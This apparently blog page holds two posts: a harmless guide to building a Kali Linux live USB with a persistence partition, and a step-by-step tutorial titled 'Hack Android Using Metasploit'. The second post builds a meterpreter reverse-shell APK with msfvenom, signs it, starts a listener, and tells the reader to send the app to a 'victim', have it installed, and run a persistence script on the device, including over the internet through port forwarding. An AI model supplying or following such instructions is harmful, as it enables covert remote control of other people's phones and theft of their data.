Friday, 28 April 2017

Kali Linux Live With Persistence

First, you'll need a program to install Kali on your USB drive and make it bootable. My program of choice is Universal USB Installer, as it's painfully easy to use and it has a direct link to many Linux distros download page within the program.


Search for this button, and get the program. Once you run it, you'll see a disclaimer page. Accept it (or read it first, if you feel like it), and you'll be presented with the configuration section (after a few seconds). Choose Kali from the dropdown menu:


Once you have downloaded your Kali image, select it:


And then choose the drive letter for your USB drive (you probably won't need to use that checkbox on the right side). Be careful when doing this.


I'd recommend to check the box that formats your USB drive. That'll wipe your whole USB drive, make sure you back up everything you had there before proceeding. It'll make a quick format, so there's no reason to avoid this.


Click on Create, then Yes, and it'll do the whole process by itself. The longest part will be extracting the ISO to your USB, but it'll be over in a matter of minutes.


If everything went as expected, you'll see this, and you have a USB you can Live boot you Kali from.


Setting Up Perisitence
You liked to Live boot from USB, but you want to save changes made into your OS, or just files (such as .pcap files) into your USB drive? You'll need to set up Persistence. Your USB drive must have 8 GB+ of storage space.
Download Mini Tool Partition Wizard Free, install it, run it and then choose Launch Application.
Right click on your USB drive, and click on Move/Resize

Use the small black arrow keys to shrink the partition size. It will leave a bit of storage space free, but if you manually assign the Partition Size, the program may fail. Click OK.



A new big grey chunk of unallocated space as appeared! Right click on it and click on Create. It'll warn us that Windows won't be able to see that partition, but we don't care about that ;)


Pick this options:
· Create as: Primary
· File System: Ext4
· Partition Label: persistence
Then click OK.

Now click on Apply (upper left corner), and just wait for it to complete the tasks.

Setting Up The Persistence

Once the partition manager finished, reboot your computer and boot up from your USB drive. Choose the option "Live USB Persistence", and when it's booted up, open a Terminal and use these commands:
Determine which partition of your drive you'll use

fdisk -l

Remember your drive had a FAT32 partition and a Ext4 (Linux) one?

Make a directory on the filesystem to mount your USB

mkdir -p /mnt/my_usb

Mount the partition on the directory you made (don't click the desktop icon labeled persistence!)

mount /dev/sdc2 /mnt/my_usb

Add a configuration file to enable persistence

echo "/ union" > /mnt/my_usb/persistence.conf

Unmount the partition and reboot

umount /dev/sdc2 && reboot

Now, if you boot up to Live USB Persistence, you'll be able to save stuff everywhere on your Linux filesystem, and every configuration you make locally will be available everywhere you plug it in :)

Wednesday, 15 February 2017

Hack Android Using Metasploit

1. Open a terminal.
2. You can do this by typing:

msfvenom -p android/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Port to Listen>
R > /root/Desktop/<anything>.apk (replace LHOST with your own IP)

Note: You can also hack android on WAN i.e. through Internet by using your Public/ExternalP in the LHOST and by port forwarding
  

.

3. Now we must generate a keystore and sign our apk because if we dont on some devices or some versions of android signature of app is required.
4. For Generating the Keystore:


keytool -genkey -v -keystore /root/Desktop/my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000



5. 
Enter a Six Digit Password and keep it remember.
6. Fill all the details and say Yes at last question asked. Keystore will be created. You will be again asked for the password.




7. Now we have to sign the apk file using this Keystore. To do this type:

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore2 my_application.apk alias_name

When it ask for the Passphrase, Enter the password you entered earlier.





8. Load metasploit console, by typing:

msfconsole





9. After it loads (it will take time), load the multi-handler exploit by typing : 


use exploit/multi/handler


10. Set up a (reverse) payload by typing: 

set payload android/meterpreter/reverse_tcp


11. To set L host type : 

set LHOST <Your IP>

Note: Even if you are hacking on WAN type your private/internal IP here not 
the public/external



12. At last type: exploit to start the listener.





13. Copy the application that you made (Anything.apk) from the root folder, 
to your android phone.
14. Then send the apk file to the phone you want to hack.
15. Let the Victim install the app.
Note: However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) from the security settings of the android phone to allow the Trojan to install.
16. And when he clicks Open, there comes the meterpreter prompt.




17. Download Persistent.sh
18. Upload the file to the device in /sdcard/Downloads.

19. cd /  (To go to the Root Directory)

19. Then navigate to the /sdcard/Download/ using cd

20. To upload the file use command:

upload /root/Desktop/Persistent.sh
(For these Images anything.sh is actually Persistent.sh)


21. Now, all we must do is execute the script once, and then everything will be done by the script automatically.
22. Drop into the system's shell by typing:

shell

23. Now, navigate to the location of the script:
cd /
cd /sdcard/Download
ls

24. Now its time for EXECUTION. Type:

sh Persistent.sh


Things To Remember:

The persistence of the backdoor will only remain until a reboot of the android system.
If you are hacking on WAN and you have a dynamic Public IP, then, the persistence will only remain until your router reboots/your IP changes.

Remember to reboot the android to eliminate the running script, if you are testing on you own Android System.
If the Victim's Android system is Rooted and your Public IP is Static, then:

1)The Persistence will remain forever on WAN!
2)The Persistence will remain forever on LAN Obviously.

Video Tutorial: